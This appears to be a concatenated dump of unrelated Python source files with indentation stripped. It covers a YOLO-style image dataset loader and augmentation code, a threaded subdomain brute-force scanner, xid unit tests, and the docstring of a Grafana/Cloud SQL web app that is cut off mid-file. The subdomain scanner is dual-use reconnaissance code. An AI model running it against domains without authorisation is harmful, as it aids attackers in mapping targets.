nm, nf, ne, nc = 0, 0, 0, 0 # number missing, found, empty, duplicate
pbar = tqdm(zip(self.img_files, self.label_files), desc='Scanning images', total=len(self.img_files))
for i, (im_file, lb_file) in enumerate(pbar):
try:
# verify images
im = Image.open(im_file)
im.verify() # PIL verify
shape = exif_size(im) # image size
segments = [] # instance segments
assert (shape[0] > 9) & (shape[1] > 9), f'image size {shape} <10 pixels'
assert im.format.lower() in img_formats, f'invalid image format {im.format}'
# verify labels
if os.path.isfile(lb_file):
nf += 1 # label found
with open(lb_file, 'r') as f:
l = [x.split() for x in f.read().strip().splitlines()]
if any([len(x) > 8 for x in l]): # is segment
classes = np.array([x[0] for x in l], dtype=np.float32)
segments = [np.array(x[1:], dtype=np.float32).reshape(-1, 2) for x in l] # (cls, xy1...)
l = np.concatenate((classes.reshape(-1, 1), segments2boxes(segments)), 1) # (cls, xywh)
l = np.array(l, dtype=np.float32)
if len(l):
assert l.shape[1] == 5, 'labels require 5 columns each'
assert (l >= 0).all(), 'negative labels'
assert (l[:, 1:] <= 1).all(), 'non-normalized or out of bounds coordinate labels'
assert np.unique(l, axis=0).shape[0] == l.shape[0], 'duplicate labels'
else:
ne += 1 # label empty
l = np.zeros((0, 5), dtype=np.float32)
else:
nm += 1 # label missing
l = np.zeros((0, 5), dtype=np.float32)
x[im_file] = [l, shape, segments]
except Exception as e:
nc += 1
print(f'{prefix}WARNING: Ignoring corrupted image and/or label {im_file}: {e}')
pbar.desc = f"{prefix}Scanning '{path.parent / path.stem}' images and labels... " \
f"{nf} found, {nm} missing, {ne} empty, {nc} corrupted"
if nf == 0:
print(f'{prefix}WARNING: No labels found in {path}. See {help_url}')
x['hash'] = get_hash(self.label_files + self.img_files)
x['results'] = nf, nm, ne, nc, i + 1
x['version'] = 0.1 # cache version
torch.save(x, path) # save for next time
logging.info(f'{prefix}New cache created: {path}')
return x
def __len__(self):
return len(self.img_files)
# def __iter__(self):
# self.count = -1
# print('ran dataset iter')
# #self.shuffled_vector = np.random.permutation(self.nF) if self.augment else np.arange(self.nF)
# return self
def __getitem__(self, index):
index = self.indices[index] # linear, shuffled, or image_weights
hyp = self.hyp
mosaic = self.mosaic and random.random() < hyp['mosaic']
if mosaic:
# Load mosaic
img, labels = load_mosaic(self, index)
shapes = None
# MixUp https://arxiv.org/pdf/1710.09412.pdf
if random.random() < hyp['mixup']:
img2, labels2 = load_mosaic(self, random.randint(0, self.n - 1))
r = np.random.beta(8.0, 8.0) # mixup ratio, alpha=beta=8.0
img = (img * r + img2 * (1 - r)).astype(np.uint8)
labels = np.concatenate((labels, labels2), 0)
else:
# Load image
img, (h0, w0), (h, w) = load_image(self, index)
# Letterbox
shape = self.batch_shapes[self.batch[index]] if self.rect else self.img_size # final letterboxed shape
img, ratio, pad = letterbox(img, shape, auto=False, scaleup=self.augment)
shapes = (h0, w0), ((h / h0, w / w0), pad) # for COCO mAP rescaling
labels = self.labels[index].copy()
if labels.size: # normalized xywh to pixel xyxy format
labels[:, 1:] = xywhn2xyxy(labels[:, 1:], ratio[0] * w, ratio[1] * h, padw=pad[0], padh=pad[1])
if self.augment:
# Augment imagespace
if not mosaic:
img, labels = random_perspective(img, labels,
degrees=hyp['degrees'],
translate=hyp['translate'],
scale=hyp['scale'],
shear=hyp['shear'],
perspective=hyp['perspective'])
# Augment colorspace
augment_hsv(img, hgain=hyp['hsv_h'], sgain=hyp['hsv_s'], vgain=hyp['hsv_v'])
# Apply cutouts
# if random.random() < 0.9:
# labels = cutout(img, labels)
nL = len(labels) # number of labels
if nL:
labels[:, 1:5] = xyxy2xywh(labels[:, 1:5]) # convert xyxy to xywh
labels[:, [2, 4]] /= img.shape[0] # normalized height 0-1
labels[:, [1, 3]] /= img.shape[1] # normalized width 0-1
if self.augment:
# flip up-down
if random.random() < hyp['flipud']:
img = np.flipud(img)
if nL:
labels[:, 2] = 1 - labels[:, 2]
# flip left-right
if random.random() < hyp['fliplr']:
img = np.fliplr(img)
if nL:
labels[:, 1] = 1 - labels[:, 1]
labels_out = torch.zeros((nL, 6))
if nL:
labels_out[:, 1:] = torch.from_numpy(labels)
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
return torch.from_numpy(img), labels_out, self.img_files[index], shapes
@staticmethod
def collate_fn(batch):
img, label, path, shapes = zip(*batch) # transposed
for i, l in enumerate(label):
l[:, 0] = i # add target image index for build_targets()
return torch.stack(img, 0), torch.cat(label, 0), path, shapes
@staticmethod
def collate_fn4(batch):
img, label, path, shapes = zip(*batch) # transposed
n = len(shapes) // 4
img4, label4, path4, shapes4 = [], [], path[:n], shapes[:n]
ho = torch.tensor([[0., 0, 0, 1, 0, 0]])
wo = torch.tensor([[0., 0, 1, 0, 0, 0]])
s = torch.tensor([[1, 1, .5, .5, .5, .5]]) # scale
for i in range(n): # zidane torch.zeros(16,3,720,1280) # BCHW
i *= 4
if random.random() < 0.5:
im = F.interpolate(img[i].unsqueeze(0).float(), scale_factor=2., mode='bilinear', align_corners=False)[
0].type(img[i].type())
l = label[i]
else:
im = torch.cat((torch.cat((img[i], img[i + 1]), 1), torch.cat((img[i + 2], img[i + 3]), 1)), 2)
l = torch.cat((label[i], label[i + 1] + ho, label[i + 2] + wo, label[i + 3] + ho + wo), 0) * s
img4.append(im)
label4.append(l)
for i, l in enumerate(label4):
l[:, 0] = i # add target image index for build_targets()
return torch.stack(img4, 0), torch.cat(label4, 0), path4, shapes4
# Ancillary functions --------------------------------------------------------------------------------------------------
def load_image(self, index):
# loads 1 image from dataset, returns img, original hw, resized hw
img = self.imgs[index]
if img is None: # not cached
path = self.img_files[index]
img = cv2.imread(path) # BGR
assert img is not None, 'Image Not Found ' + path
h0, w0 = img.shape[:2] # orig hw
r = self.img_size / max(h0, w0) # resize image to img_size
if r != 1: # always resize down, only resize up if training with augmentation
interp = cv2.INTER_AREA if r < 1 and not self.augment else cv2.INTER_LINEAR
img = cv2.resize(img, (int(w0 * r), int(h0 * r)), interpolation=interp)
return img, (h0, w0), img.shape[:2] # img, hw_original, hw_resized
else:
return self.imgs[index], self.img_hw0[index], self.img_hw[index] # img, hw_original, hw_resized
def augment_hsv(img, hgain=0.5, sgain=0.5, vgain=0.5):
r = np.random.uniform(-1, 1, 3) * [hgain, sgain, vgain] + 1 # random gains
hue, sat, val = cv2.split(cv2.cvtColor(img, cv2.COLOR_BGR2HSV))
dtype = img.dtype # uint8
x = np.arange(0, 256, dtype=np.int16)
lut_hue = ((x * r[0]) % 180).astype(dtype)
lut_sat = np.clip(x * r[1], 0, 255).astype(dtype)
lut_val = np.clip(x * r[2], 0, 255).astype(dtype)
img_hsv = cv2.merge((cv2.LUT(hue, lut_hue), cv2.LUT(sat, lut_sat), cv2.LUT(val, lut_val))).astype(dtype)
cv2.cvtColor(img_hsv, cv2.COLOR_HSV2BGR, dst=img) # no return needed
def hist_equalize(img, clahe=True, bgr=False):
# Equalize histogram on BGR image 'img' with img.shape(n,m,3) and range 0-255
yuv = cv2.cvtColor(img, cv2.COLOR_BGR2YUV if bgr else cv2.COLOR_RGB2YUV)
if clahe:
c = cv2.createCLAHE(clipLimit=2.0, tileGridSize=(8, 8))
yuv[:, :, 0] = c.apply(yuv[:, :, 0])
else:
yuv[:, :, 0] = cv2.equalizeHist(yuv[:, :, 0]) # equalize Y channel histogram
return cv2.cvtColor(yuv, cv2.COLOR_YUV2BGR if bgr else cv2.COLOR_YUV2RGB) # convert YUV image to RGB
def load_mosaic(self, index):
# loads images in a 4-mosaic
labels4, segments4 = [], []
s = self.img_size
yc, xc = [int(random.uniform(-x, 2 * s + x)) for x in self.mosaic_border] # mosaic center x, y
indices = [index] + random.choices(self.indices, k=3) # 3 additional image indices
for i, index in enumerate(indices):
# Load image
img, _, (h, w) = load_image(self, index)
# place img in img4
if i == 0: # top left
img4 = np.full((s * 2, s * 2, img.shape[2]), 114, dtype=np.uint8) # base image with 4 tiles
x1a, y1a, x2a, y2a = max(xc - w, 0), max(yc - h, 0), xc, yc # xmin, ymin, xmax, ymax (large image)
x1b, y1b, x2b, y2b = w - (x2a - x1a), h - (y2a - y1a), w, h # xmin, ymin, xmax, ymax (small image)
elif i == 1: # top right
x1a, y1a, x2a, y2a = xc, max(yc - h, 0), min(xc + w, s * 2), yc
x1b, y1b, x2b, y2b = 0, h - (y2a - y1a), min(w, x2a - x1a), h
elif i == 2: # bottom left
x1a, y1a, x2a, y2a = max(xc - w, 0), yc, xc, min(s * 2, yc + h)
x1b, y1b, x2b, y2b = w - (x2a - x1a), 0, w, min(y2a - y1a, h)
elif i == 3: # bottom right
x1a, y1a, x2a, y2a = xc, yc, min(xc + w, s * 2), min(s * 2, yc + h)
x1b, y1b, x2b, y2b = 0, 0, min(w, x2a - x1a), min(y2a - y1a, h)
img4[y1a:y2a, x1a:x2a] = img[y1b:y2b, x1b:x2b] # img4[ymin:ymax, xmin:xmax]
padw = x1a - x1b
padh = y1a - y1b
# Labels
labels, segments = self.labels[index].copy(), self.segments[index].copy()
if labels.size:
labels[:, 1:] = xywhn2xyxy(labels[:, 1:], w, h, padw, padh) # normalized xywh to pixel xyxy format
segments = [xyn2xy(x, w, h, padw, padh) for x in segments]
labels4.append(labels)
segments4.extend(segments)
# Concat/clip labels
labels4 = np.concatenate(labels4, 0)
for x in (labels4[:, 1:], *segments4):
np.clip(x, 0, 2 * s, out=x) # clip when using random_perspective()
# img4, labels4 = replicate(img4, labels4) # replicate
# Augment
img4, labels4 = random_perspective(img4, labels4, segments4,
degrees=self.hyp['degrees'],
translate=self.hyp['translate'],
scale=self.hyp['scale'],
shear=self.hyp['shear'],
perspective=self.hyp['perspective'],
border=self.mosaic_border) # border to remove
return img4, labels4
def load_mosaic9(self, index):
# loads images in a 9-mosaic
labels9, segments9 = [], []
s = self.img_size
indices = [index] + random.choices(self.indices, k=8) # 8 additional image indices
for i, index in enumerate(indices):
# Load image
img, _, (h, w) = load_image(self, index)
# place img in img9
if i == 0: # center
img9 = np.full((s * 3, s * 3, img.shape[2]), 114, dtype=np.uint8) # base image with 4 tiles
h0, w0 = h, w
c = s, s, s + w, s + h # xmin, ymin, xmax, ymax (base) coordinates
elif i == 1: # top
c = s, s - h, s + w, s
elif i == 2: # top right
c = s + wp, s - h, s + wp + w, s
elif i == 3: # right
c = s + w0, s, s + w0 + w, s + h
elif i == 4: # bottom right
c = s + w0, s + hp, s + w0 + w, s + hp + h
elif i == 5: # bottom
c = s + w0 - w, s + h0, s + w0, s + h0 + h
elif i == 6: # bottom left
c = s + w0 - wp - w, s + h0, s + w0 - wp, s + h0 + h
elif i == 7: # left
c = s - w, s + h0 - h, s, s + h0
elif i == 8: # top left
c = s - w, s + h0 - hp - h, s, s + h0 - hp
padx, pady = c[:2]
x1, y1, x2, y2 = [max(x, 0) for x in c] # allocate coords
# Labels
labels, segments = self.labels[index].copy(), self.segments[index].copy()
if labels.size:
labels[:, 1:] = xywhn2xyxy(labels[:, 1:], w, h, padx, pady) # normalized xywh to pixel xyxy format
segments = [xyn2xy(x, w, h, padx, pady) for x in segments]
labels9.append(labels)
segments9.extend(segments)
# Image
img9[y1:y2, x1:x2] = img[y1 - pady:, x1 - padx:] # img9[ymin:ymax, xmin:xmax]
hp, wp = h, w # height, width previous
# Offset
yc, xc = [int(random.uniform(0, s)) for _ in self.mosaic_border] # mosaic center x, y
img9 = img9[yc:yc + 2 * s, xc:xc + 2 * s]
# Concat/clip labels
labels9 = np.concatenate(labels9, 0)
labels9[:, [1, 3]] -= xc
labels9[:, [2, 4]] -= yc
c = np.array([xc, yc]) # centers
segments9 = [x - c for x in segments9]
for x in (labels9[:, 1:], *segments9):
np.clip(x, 0, 2 * s, out=x) # clip when using random_perspective()
# img9, labels9 = replicate(img9, labels9) # replicate
# Augment
img9, labels9 = random_perspective(img9, labels9, segments9,
degrees=self.hyp['degrees'],
translate=self.hyp['translate'],
scale=self.hyp['scale'],
shear=self.hyp['shear'],
perspective=self.hyp['perspective'],
border=self.mosaic_border) # border to remove
return img9, labels9
def replicate(img, labels):
# Replicate labels
h, w = img.shape[:2]
boxes = labels[:, 1:].astype(int)
x1, y1, x2, y2 = boxes.T
s = ((x2 - x1) + (y2 - y1)) / 2 # side length (pixels)
for i in s.argsort()[:round(s.size * 0.5)]: # smallest indices
x1b, y1b, x2b, y2b = boxes[i]
bh, bw = y2b - y1b, x2b - x1b
yc, xc = int(random.uniform(0, h - bh)), int(random.uniform(0, w - bw)) # offset x, y
x1a, y1a, x2a, y2a = [xc, yc, xc + bw, yc + bh]
img[y1a:y2a, x1a:x2a] = img[y1b:y2b, x1b:x2b] # img4[ymin:ymax, xmin:xmax]
labels = np.append(labels, [[labels[i, 0], x1a, y1a, x2a, y2a]], axis=0)
return img, labels
def letterbox(img, new_shape=(640, 640), color=(114, 114, 114), auto=True, scaleFill=False, scaleup=True, stride=32):
# Resize and pad image while meeting stride-multiple constraints
shape = img.shape[:2] # current shape [height, width]
if isinstance(new_shape, int):
new_shape = (new_shape, new_shape)
# Scale ratio (new / old)
r = min(new_shape[0] / shape[0], new_shape[1] / shape[1])
if not scaleup: # only scale down, do not scale up (for better all_test mAP)
r = min(r, 1.0)
# Compute padding
ratio = r, r # width, height ratios
new_unpad = int(round(shape[1] * r)), int(round(shape[0] * r))
dw, dh = new_shape[1] - new_unpad[0], new_shape[0] - new_unpad[1] # wh padding
if auto: # minimum rectangle
dw, dh = np.mod(dw, stride), np.mod(dh, stride) # wh padding
elif scaleFill: # stretch
dw, dh = 0.0, 0.0
new_unpad = (new_shape[1], new_shape[0])
ratio = new_shape[1] / shape[1], new_shape[0] / shape[0] # width, height ratios
dw /= 2 # divide padding into 2 sides
dh /= 2
if shape[::-1] != new_unpad: # resize
img = cv2.resize(img, new_unpad, interpolation=cv2.INTER_LINEAR)
top, bottom = int(round(dh - 0.1)), int(round(dh + 0.1))
left, right = int(round(dw - 0.1)), int(round(dw + 0.1))
img = cv2.copyMakeBorder(img, top, bottom, left, right, cv2.BORDER_CONSTANT, value=color) # add border
return img, ratio, (dw, dh)
def random_perspective(img, targets=(), segments=(), degrees=10, translate=.1, scale=.1, shear=10, perspective=0.0,
border=(0, 0)):
# torchvision.transforms.RandomAffine(degrees=(-10, 10), translate=(.1, .1), scale=(.9, 1.1), shear=(-10, 10))
# targets = [cls, xyxy]
height = img.shape[0] + border[0] * 2 # shape(h,w,c)
width = img.shape[1] + border[1] * 2
# Center
C = np.eye(3)
C[0, 2] = -img.shape[1] / 2 # x translation (pixels)
C[1, 2] = -img.shape[0] / 2 # y translation (pixels)
# Perspective
P = np.eye(3)
P[2, 0] = random.uniform(-perspective, perspective) # x perspective (about y)
P[2, 1] = random.uniform(-perspective, perspective) # y perspective (about x)
# Rotation and Scale
R = np.eye(3)
a = random.uniform(-degrees, degrees)
# a += random.choice([-180, -90, 0, 90]) # add 90deg rotations to small rotations
s = random.uniform(1 - scale, 1 + scale)
# s = 2 ** random.uniform(-scale, scale)
R[:2] = cv2.getRotationMatrix2D(angle=a, center=(0, 0), scale=s)
# Shear
S = np.eye(3)
S[0, 1] = math.tan(random.uniform(-shear, shear) * math.pi / 180) # x shear (deg)
S[1, 0] = math.tan(random.uniform(-shear, shear) * math.pi / 180) # y shear (deg)
# Translation
T = np.eye(3)
T[0, 2] = random.uniform(0.5 - translate, 0.5 + translate) * width # x translation (pixels)
T[1, 2] = random.uniform(0.5 - translate, 0.5 + translate) * height # y translation (pixels)
# Combined rotation matrix
M = T @ S @ R @ P @ C # order of operations (right to left) is IMPORTANT
if (border[0] != 0) or (border[1] != 0) or (M != np.eye(3)).any(): # image changed
if perspective:
img = cv2.warpPerspective(img, M, dsize=(width, height), borderValue=(114, 114, 114))
else: # affine
img = cv2.warpAffine(img, M[:2], dsize=(width, height), borderValue=(114, 114, 114))
# Visualize
# import matplotlib.pyplot as plt
# ax = plt.subplots(1, 2, figsize=(12, 6))[1].ravel()
# ax[0].imshow(img[:, :, ::-1]) # base
# ax[1].imshow(img2[:, :, ::-1]) # warped
# Transform label coordinates
n = len(targets)
if n:
use_segments = any(x.any() for x in segments)
new = np.zeros((n, 4))
if use_segments: # warp segments
segments = resample_segments(segments) # upsample
for i, segment in enumerate(segments):
xy = np.ones((len(segment), 3))
xy[:, :2] = segment
xy = xy @ M.T # transform
xy = xy[:, :2] / xy[:, 2:3] if perspective else xy[:, :2] # perspective rescale or affine
# clip
new[i] = segment2box(xy, width, height)
else: # warp boxes
xy = np.ones((n * 4, 3))
xy[:, :2] = targets[:, [1, 2, 3, 4, 1, 4, 3, 2]].reshape(n * 4, 2) # x1y1, x2y2, x1y2, x2y1
xy = xy @ M.T # transform
xy = (xy[:, :2] / xy[:, 2:3] if perspective else xy[:, :2]).reshape(n, 8) # perspective rescale or affine
# create new boxes
x = xy[:, [0, 2, 4, 6]]
y = xy[:, [1, 3, 5, 7]]
new = np.concatenate((x.min(1), y.min(1), x.max(1), y.max(1))).reshape(4, n).T
# clip
new[:, [0, 2]] = new[:, [0, 2]].clip(0, width)
new[:, [1, 3]] = new[:, [1, 3]].clip(0, height)
# filter candidates
i = box_candidates(box1=targets[:, 1:5].T * s, box2=new.T, area_thr=0.01 if use_segments else 0.10)
targets = targets[i]
targets[:, 1:5] = new[i]
return img, targets
def box_candidates(box1, box2, wh_thr=2, ar_thr=20, area_thr=0.1, eps=1e-16): # box1(4,n), box2(4,n)
# Compute candidate boxes: box1 before augment, box2 after augment, wh_thr (pixels), aspect_ratio_thr, area_ratio
w1, h1 = box1[2] - box1[0], box1[3] - box1[1]
w2, h2 = box2[2] - box2[0], box2[3] - box2[1]
ar = np.maximum(w2 / (h2 + eps), h2 / (w2 + eps)) # aspect ratio
return (w2 > wh_thr) & (h2 > wh_thr) & (w2 * h2 / (w1 * h1 + eps) > area_thr) & (ar < ar_thr) # candidates
def cutout(image, labels):
# Applies image cutout augmentation https://arxiv.org/abs/1708.04552
h, w = image.shape[:2]
def bbox_ioa(box1, box2):
# Returns the intersection over box2 area given box1, box2. box1 is 4, box2 is nx4. boxes are x1y1x2y2
box2 = box2.transpose()
# Get the coordinates of bounding boxes
b1_x1, b1_y1, b1_x2, b1_y2 = box1[0], box1[1], box1[2], box1[3]
b2_x1, b2_y1, b2_x2, b2_y2 = box2[0], box2[1], box2[2], box2[3]
# Intersection area
inter_area = (np.minimum(b1_x2, b2_x2) - np.maximum(b1_x1, b2_x1)).clip(0) * \
(np.minimum(b1_y2, b2_y2) - np.maximum(b1_y1, b2_y1)).clip(0)
# box2 area
box2_area = (b2_x2 - b2_x1) * (b2_y2 - b2_y1) + 1e-16
# Intersection over box2 area
return inter_area / box2_area
# create random masks
scales = [0.5] * 1 + [0.25] * 2 + [0.125] * 4 + [0.0625] * 8 + [0.03125] * 16 # image size fraction
for s in scales:
mask_h = random.randint(1, int(h * s))
mask_w = random.randint(1, int(w * s))
# box
xmin = max(0, random.randint(0, w) - mask_w // 2)
ymin = max(0, random.randint(0, h) - mask_h // 2)
xmax = min(w, xmin + mask_w)
ymax = min(h, ymin + mask_h)
# apply random color mask
image[ymin:ymax, xmin:xmax] = [random.randint(64, 191) for _ in range(3)]
# return unobscured labels
if len(labels) and s > 0.03:
box = np.array([xmin, ymin, xmax, ymax], dtype=np.float32)
ioa = bbox_ioa(box, labels[:, 1:5]) # intersection over area
labels = labels[ioa < 0.60] # remove >60% obscured labels
return labels
def create_folder(path='./new'):
# Create folder
if os.path.exists(path):
shutil.rmtree(path) # delete output folder
os.makedirs(path) # make new output folder
def flatten_recursive(path='../coco128'):
# Flatten a recursive directory by bringing all files to top level
new_path = Path(path + '_flat')
create_folder(new_path)
for file in tqdm(glob.glob(str(Path(path)) + '/**/*.*', recursive=True)):
shutil.copyfile(file, new_path / Path(file).name)
def extract_boxes(path='../coco128/'): # from utils.datasets import *; extract_boxes('../coco128')
# Convert detection dataset into classification dataset, with one directory per class
path = Path(path) # images dir
shutil.rmtree(path / 'classifier') if (path / 'classifier').is_dir() else None # remove existing
files = list(path.rglob('*.*'))
n = len(files) # number of files
for im_file in tqdm(files, total=n):
if im_file.suffix[1:] in img_formats:
# image
im = cv2.imread(str(im_file))[..., ::-1] # BGR to RGB
h, w = im.shape[:2]
# labels
lb_file = Path(img2label_paths([str(im_file)])[0])
if Path(lb_file).exists():
with open(lb_file, 'r') as f:
lb = np.array([x.split() for x in f.read().strip().splitlines()], dtype=np.float32) # labels
for j, x in enumerate(lb):
c = int(x[0]) # class
f = (path / 'classifier') / f'{c}' / f'{path.stem}_{im_file.stem}_{j}.jpg' # new filename
if not f.parent.is_dir():
f.parent.mkdir(parents=True)
b = x[1:] * [w, h, w, h] # box
# b[2:] = b[2:].max() # rectangle to square
b[2:] = b[2:] * 1.2 + 3 # pad
b = xywh2xyxy(b.reshape(-1, 4)).ravel().astype(np.int)
b[[0, 2]] = np.clip(b[[0, 2]], 0, w) # clip boxes outside of image
b[[1, 3]] = np.clip(b[[1, 3]], 0, h)
assert cv2.imwrite(str(f), im[b[1]:b[3], b[0]:b[2]]), f'box failure in {f}'
def autosplit(path='../coco128', weights=(0.9, 0.1, 0.0), annotated_only=False):
""" Autosplit a dataset into train/val/all_test splits and save path/autosplit_*.txt files
Usage: from utils.datasets import *; autosplit('../coco128')
Arguments
path: Path to images directory
weights: Train, val, all_test weights (list)
annotated_only: Only use images with an annotated txt file
"""
path = Path(path) # images dir
files = sum([list(path.rglob(f"*.{img_ext}")) for img_ext in img_formats], []) # image files only
n = len(files) # number of files
indices = random.choices([0, 1, 2], weights=weights, k=n) # assign each image to a split
txt = ['autosplit_train.txt', 'autosplit_val.txt', 'autosplit_test.txt'] # 3 txt files
[(path / x).unlink() for x in txt if (path / x).exists()] # remove existing
print(f'Autosplitting images from {path}' + ', using *.txt labeled images only' * annotated_only)
for i, img in tqdm(zip(indices, files), total=n):
if not annotated_only or Path(img2label_paths([str(img)])[0]).exists(): # check label
with open(path / txt[i], 'a') as f:
f.write(str(img) + '\n') # add image to txt file
|
fast_subdomain_scanner.py | import requests
from threading import Thread, Lock
from queue import Queue
q = Queue()
list_lock = Lock()
discovered_domains = []
def scan_subdomains(domain):
global q
while True:
# get the subdomain from the queue
subdomain = q.get()
# scan the subdomain
url = f"http://{subdomain}.{domain}"
try:
requests.get(url)
except requests.ConnectionError:
pass
else:
print("[+] Discovered subdomain:", url)
# add the subdomain to the global list
with list_lock:
discovered_domains.append(url)
# we're done with scanning that subdomain
q.task_done()
def main(domain, n_threads, subdomains):
global q
# fill the queue with all the subdomains
for subdomain in subdomains:
q.put(subdomain)
for t in range(n_threads):
# start all threads
worker = Thread(target=scan_subdomains, args=(domain,))
# daemon thread means a thread that will end when the main thread ends
worker.daemon = True
worker.start()
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(description="Faster Subdomain Scanner using Threads")
parser.add_argument("domain", help="Domain to scan for subdomains without protocol (e.g without 'http://' or 'https://')")
parser.add_argument("-l", "--wordlist", help="File that contains all subdomains to scan, line by line. Default is subdomains.txt",
default="subdomains.txt")
parser.add_argument("-t", "--num-threads", help="Number of threads to use to scan the domain. Default is 10", default=10, type=int)
parser.add_argument("-o", "--output-file", help="Specify the output text file to write discovered subdomains")
args = parser.parse_args()
domain = args.domain
wordlist = args.wordlist
num_threads = args.num_threads
output_file = args.output_file
main(domain=domain, n_threads=num_threads, subdomains=open(wordlist).read().splitlines())
q.join()
# save the file
with open(output_file, "w") as f:
for url in discovered_domains:
print(url, file=f)
|
xid_test.py | import unittest
from xid import Xid
TestXids = [
# taken from https://github.com/rs/xid/blob/master/id_test.go
{
'xid': Xid([0x4d, 0x88, 0xe1, 0x5b, 0x60, 0xf4, 0x86, 0xe4, 0x28, 0x41, 0x2d, 0xc9]),
'ts': 1300816219,
'machine': ''.join(map(chr, [0x60, 0xf4, 0x86])),
'pid': 0xe428,
'counter': 4271561
},
{
'xid': Xid([0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00]),
'ts': 0,
'machine': ''.join(map(chr, [0x00, 0x00, 0x00])),
'pid': 0x0000,
'counter': 0
},
{
'xid': Xid([0x00, 0x00, 0x00, 0x00, 0xaa, 0xbb, 0xcc, 0xdd, 0xee, 0x00, 0x00, 0x01]),
'ts': 0,
'machine': ''.join(map(chr, [0xaa, 0xbb, 0xcc])),
'pid': 0xddee,
'counter': 1
}
]
class TestXid(unittest.TestCase):
def test_no_duplicates(self):
collect = []
for i in range(0, 1000):
collect.append(Xid())
ids = [i.string() for i in collect]
self.assertEqual(len(set(ids)), 1000)
def test_from_string(self):
x = Xid()
y = Xid.from_string(x.string())
self.assertEqual(x.value, y.value)
self.assertEqual(x.bytes(), y.bytes())
self.assertEqual(x.string(), y.string())
def test_xid_always_reversible(self):
for i in range(1000):
s = Xid().string()
self.assertEqual(Xid.from_string(s).string(), s)
def test_timestamp(self):
for x in TestXids:
self.assertEqual(x.get('xid').time(), x.get('ts'))
def test_machine(self):
for x in TestXids:
self.assertEqual(x.get('xid').machine(), x.get('machine'))
def test_pid(self):
for x in TestXids:
self.assertEqual(x.get('xid').pid(), x.get('pid'))
def test_counter(self):
for x in TestXids:
self.assertEqual(x.get('xid').counter(), x.get('counter'))
def test_copy_array_from_golang(self):
x = Xid([0x4d, 0x88, 0xe1, 0x5b, 0x60, 0xf4,
0x86, 0xe4, 0x28, 0x41, 0x2d, 0xc9])
self.assertEqual('9m4e2mr0ui3e8a215n4g', x.string())
def test_copy_string_from_golang(self):
x = Xid.from_string('9m4e2mr0ui3e8a215n4g')
self.assertEqual(x.value, [0x4d, 0x88, 0xe1, 0x5b, 0x60, 0xf4,
0x86, 0xe4, 0x28, 0x41, 0x2d, 0xc9])
def test_thread_safety(self):
import threading
threads = []
def worker():
for i in range(10):
threading.current_thread().ident, Xid().string()
for i in range(10):
t = threading.Thread(target=worker)
threads.append(t)
t.start()
for t in threads:
t.join()
if __name__ == '__main__':
unittest.main()
|
app.py | # ------------------------------------------------------------------------------
# Copyright IBM Corp. 2020
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ------------------------------------------------------------------------------
"""WSGI-based web app
(Python 3.8 compatible)
https://stackoverflow.com/questions/32799808/python-web-application-project-structure-and-docker-support
1. able to process and store connection to Cloud SQL server [json database file]
2. able to process `table` and `time-series` request and return data
3. handle empty request string
4. handle empty returned data
5. able to handle request in concurrent -> thread-specific or coroutine-specific sqlClient object
6. able to handle NaN data and convert to empty string before returning
7. support special functions: $__timeFilter() and $__timeFilter(aiops) -
assumes the time column is a number, i.e. long type or timestamp type
8. allow caching based on `key` and sql_stmt
9. columns detection in SELECT statement:
SELECT name
SELECT fake as name
SELECT ts_explode(...) AS (name1, name2)
10. support special functions: $__source (HIVE table and COS URL)
11. add streaming time-series and multi-times series: $__source_test(TS), $__source_test(MTS)
12. can handle multiple queries at once
13. handle 'hide=True' when user don't want to run a query
14. add 'get_result' option to allow not returning any result back - good for chained queries
15. add '--time-out' option [to pass in the value (in seconds) before timeout when
the webapp is launched as a service in IBM CloudEngine for example]
16. add '--ssl' option [to run HTTPS Webserver]
17. support using $__source in CREATE TABLE statement
18. $__timeFilter(string) - now accept 'string' if the time colum is represented as a string
19. a 'time' column is now automatically converted to datetime - if it's stored in string
20. able to detect column name correctly even inside a nested SELECT statement [Feb 12, 2021]
21. able to detect and reject 'SELECT *'
22. add new macro: '$__timeFilterColumn(col-name, [type])' - user can explicitly specify
the column containing timestamp-data, and need to provide its type
(string or long/timestamp or empty) [Feb 12, 2021]
23. add iam_max_tries
24. add and use the thin-version of query-data so that the memcached no long cache the data - only tracks the job_id (just like the get_result=False scenarion) and use this to pull the data from COS
25. enhance column extraction: support the present of 'distinct' and 'all' in the select column
26. func_get_macro_mapping argument: now can be either the string or a function that returns a string
27. save data is now guaranteed to be safe from interrupt, e.g. Ctrl-C
28. job_id is now part of the saving to the state of CloudSQLDB.
29. if a query is switched from get_result=True to False, it won't be rerun, based on change in (24).
30. stop using (24) as the default - cache the whole data. The reason is that request the data from COS is still having significant delay.
31. add singletonSqlClient: apply TS-related query transformation before using that content for tracking query.
32. TooManyRowsException: add the check for number of rows limit: prevent Grafana client from waiting for transferring too large data
33. NoResultException: add the check for query without any returned data
CHANGED BEHAVIOR:
* [grafana] revise conf. setting so that $__source is optional - with tooltips to explain why user should provide
* [grafana] add $__dest to use the default one - $__dest(csv): $__dest, $__dest(), $__dest(csv)
$__dest(parquet), $__dest(arvo, a/b/c)
* add $__source_prev, $__source_prev(), $__source_prev(A), $__source_prev(B) to refer to the
data source as the output from a previous query, or a given query based on its `refId` A or B.
* avoid re-create sqlClient in a panel with multiple queries
* use status code 403, rather than 401, for error: newer Grafana 7.3.x for some reasons
maps 401 to 400 and the original message is lost
* check `should_sql_stmt_be_run` move to outside the loop --> faster for a panel
with multiple queries
(the check is not vigorous - sql is compared before any transformation done so that
adjacent spaces are also considered)
* HTTPS/SSL is added (--ssl)
code:
$__dest[( format [, suffix] )]
TODO:
* add the capability to reference to a variable - so that the dashboard can be udpated based on the
value(s) user selected for that variable
* add $__get_schema(hivetable), $__get_schema(COS://URL, format), $__get_schema($__source)
BUG fixes:
1. when metrics name is not a string
2. detect column name properly when a comment is right after it
"""
try:
# A gevent-based server is actually not asynchronous, but massively multi-threaded.
import gevent
from gevent import monkey
monkey.patch_all()
except:
